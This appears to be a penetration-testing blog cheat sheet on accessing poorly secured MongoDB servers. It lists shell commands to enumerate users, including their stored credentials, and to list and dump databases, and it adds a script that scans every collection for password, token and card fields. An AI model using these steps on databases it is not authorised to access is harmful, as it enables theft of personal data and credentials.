Thursday, July 2, 2015

Intro to Hacking MongoDB

By Tony Lee


Introduction

There is a plethora of literature on hacking SQL databases, including going from database access to OS-level command execution or shells.  There seems to be a shortage of information on hacking NoSQL databases such as MongoDB, however.  This article will hopefully help others get a jump start when they run into a MongoDB instance with weak or no credentials (yes, it has happened).  It does not list all possibilities and is only meant to be a cheat sheet.  Feel free to list your favorite commands as well as tips and tricks in the comment section below.


Install mongo client on Kali:

apt-get install mongodb-clients

Note:  this package provides the mongo shell plus the mongodump, mongorestore and bsondump tools used below.


Connect to DB:

mongo --port <port> -u <username> -p <password> <IP>
Note:  Port 27017 is the default value.  If the server has no authentication enabled (the common misconfiguration), drop -u/-p and just run mongo <IP>.  With -u/-p the shell authenticates against the database named in the connection target ("test" if none is given); since MongoDB 2.6 users normally live in the admin database, so add --authenticationDatabase admin if a known-good login is rejected.

ex:  mongo -u foo -p bar 10.10.10.10
ex:  mongo -u foo -p bar --authenticationDatabase admin 10.10.10.10


Show server info:

db.adminCommand( { "hostInfo" : 1 } )

Note:  hostInfo requires the hostInfo privilege (part of the built-in clusterMonitor role), so it can fail for a low-privilege account.  db.version() and db.adminCommand( { "buildInfo" : 1 } ) return the server version and build details and are the first thing to check against known issues in that release.

ex: db.adminCommand( { "hostInfo" : 1 } )
{
    "system" : {
        "currentTime" : ISODate("2014-03-01T14:47:54.379Z"),
        "hostname" : "AwesomePC",
        "cpuAddrSize" : 64,
        "memSizeMB" : 1002,
        "numCores" : 2,
        "cpuArch" : "x86_64",
        "numaEnabled" : false
    },
    "os" : {
        "type" : "Linux",
        "name" : "PRETTY_NAME=\"Debian GNU/Linux 7 (wheezy)\"",
        "version" : "Kernel 3.2.0-4-amd64"
    },
    "extra" : {
        "versionString" : "Linux version 3.2.0-4-amd64 (debian-kernel@lists.debian.org) (gcc version 4.6.3 (Debian 4.6.3-14) ) #1 SMP Debian 3.2.63-2+deb7u1",
        "libcVersion" : "2.13",
        "kernelVersion" : "3.2.0-4-amd64",
        "cpuFrequencyMHz" : "2266.747"
    },
    "ok" : 1
}


Show users:

show users
-or-
db.runCommand( { usersInfo: 1 } )

Note:  both list only the users of the current database.  Since MongoDB 2.6 users are normally created in the admin database, so switch there first (use admin) or read them all with db.getSiblingDB("admin").system.users.find().  usersInfo omits the stored credentials unless asked:  db.runCommand( { usersInfo: 1, showCredentials: true } )

ex:  show users


Show roles:

show roles

ex:  show roles


Show databases:

show dbs

Note:  this requires the listDatabases privilege.  If it returns nothing for a restricted account, you can still switch to a database whose name you know or can guess (application names, "admin", "local", "config") and try to list its collections.

ex:  show dbs
SecretDB  (size of DB)
AwesomeDB (size of DB)
EmptyDB   (empty)


Use database:

use <db_name>

ex:  use SecretDB


Show tables (called collections):

show tables
-or-
show collections
-or-
db.getCollectionNames()

Note:  db.<name>.find() only works when the collection name is a valid JavaScript identifier; for names containing dots, spaces or dashes use db.getCollection("<name>").find() instead.

ex: show tables
fluffy
users


List data in the table/collection:

db.<table_name>.find()

ex:  db.users.find()

Note:  the shell prints the first 20 documents and then waits; type it to print the next 20.  Add .pretty() for indented output, and check how much data you are dealing with first using db.<table_name>.count().

Can also set limit with:
db.<table_name>.find().limit(#)

ex:  db.users.find().limit(5)


Search for exact match in the table/collection:

db.<collection_name>.find( { <field_name> : "<value>" } )

Note:  what SQL calls a column is a field in MongoDB.  Fields inside a sub-document are addressed with quoted dot notation, e.g. { "address.city" : "Boston" }.

ex:  db.users.find( { name : "Tony" } )


Wildcard search data in the table/collection:

db.<collection_name>.find( { <field_name> : /<value>/i } )

Note:  the i after the closing / makes the match case insensitive.  The pattern is unanchored, so /tony/ matches anywhere in the value; use /^tony/ to match only the start.  Regex matching applies to string fields, not to numbers or dates.

ex:  db.users.find( { name : /tony/i } )
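The steps above (list databases, list collections, pull documents, search them) are the same loop on every target, so here is a mongo shell script that runs that loop over everything the current login can reach and flags fields whose names look like credentials.  It is an added example, not code from the original post.  The file name enum_mongo.js, the sample size and the SENSITIVE_KEY pattern are assumptions to adjust per engagement; 10.10.10.10 and foo/bar are the placeholders used throughout this post.  The automatic call at the bottom only fires inside the mongo shell (where db exists), so the functions can also be exercised from Node with a stand-in connection object.

```javascript
// enum_mongo.js - walk every database and collection the current login can read
// and report field names that look like credentials.  Added example, not from the
// original post; SENSITIVE_KEY is an assumed starting pattern, tune it per engagement.
//
//   mongo --host 10.10.10.10 enum_mongo.js
//   mongo --host 10.10.10.10 -u foo -p bar --authenticationDatabase admin enum_mongo.js

var SENSITIVE_KEY = /pass|pwd|secret|token|api_?key|ssn|card|cvv|hash|salt/i;

// Recursively walk one document; return [{path, value}] for every key matching SENSITIVE_KEY.
function findSensitiveFields(doc, prefix, hits) {
  hits = hits || [];
  Object.keys(doc).forEach(function (k) {
    var path = prefix ? prefix + "." + k : k;
    var v = doc[k];
    if (SENSITIVE_KEY.test(k)) {
      hits.push({ path: path, value: String(v) });
    }
    // Recurse into sub-documents and arrays (typeof [] === "object").
    if (v !== null && typeof v === "object" && !(v instanceof Date)) {
      findSensitiveFields(v, path, hits);
    }
  });
  return hits;
}

// Enumerate databases -> collections -> the first `sample` documents of each, using
// the same calls that back `show dbs`, `show collections` and find().limit().
// `conn` is the shell's global `db` object (or a stand-in exposing the same methods).
function enumerateServer(conn, sample) {
  var report = [];
  var dbNames = conn.adminCommand({ listDatabases: 1 }).databases.map(function (d) {
    return d.name;
  });
  dbNames.forEach(function (name) {
    var database = conn.getSiblingDB(name);
    database.getCollectionNames().forEach(function (collName) {
      var coll = database.getCollection(collName);
      var entry = { db: name, collection: collName, count: coll.count(), hits: [] };
      coll.find().limit(sample).forEach(function (doc) {
        entry.hits = entry.hits.concat(findSensitiveFields(doc, "", []));
      });
      report.push(entry);
    });
  });
  return report;
}

// Only run automatically inside the mongo shell, where `db` and `printjson` exist.
if (typeof db !== "undefined" && typeof printjson === "function") {
  printjson(enumerateServer(db, 50));
}
```

Hits are a prompt for manual review, not proof of anything: a field called password may already be hashed, and a name that happens to match the pattern may hold nothing interesting.  The sample size keeps the script polite on large collections; raise it once you know what you are looking at.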


Dump the DB for off-line grepping:

mongodump -u <user> -p <pass> -h <IP> --db <db_name>

ex:  mongodump -u foo -p bar -h 10.10.10.10 --db SecretDB

Note:  Results are dumped to:  dump/<db_name>/<collection_name>.bson, with a <collection_name>.metadata.json beside each one.  Leave out --db to dump every database the account can read, and add --authenticationDatabase admin if the user lives in admin.  The .bson files are binary, so convert them before grepping:  bsondump dump/SecretDB/users.bson | grep -i pass


Logout:

db.logout()
-or-
exit

Note:  db.logout() ends the authenticated session but leaves the shell open; exit (or quit()) closes the shell.




CAVEATS:

The mongo shell's file and process helpers run on your machine, not on the remote server: cat(), ls(), load(), run() and runProgram() all execute locally.
ex:  cat ("/etc/shadow") is your own shadow file :(  Bummer, I know!

Server-side JavaScript ($where, mapReduce and db.eval(), the last deprecated since 3.0 and removed in 4.2) does run on the server, but the embedded engine exposes no file or network API, so it gets you data and server CPU, not a shell.  There is no MongoDB equivalent of xp_cmdshell; going from database access to OS execution needs a separate weakness on the host.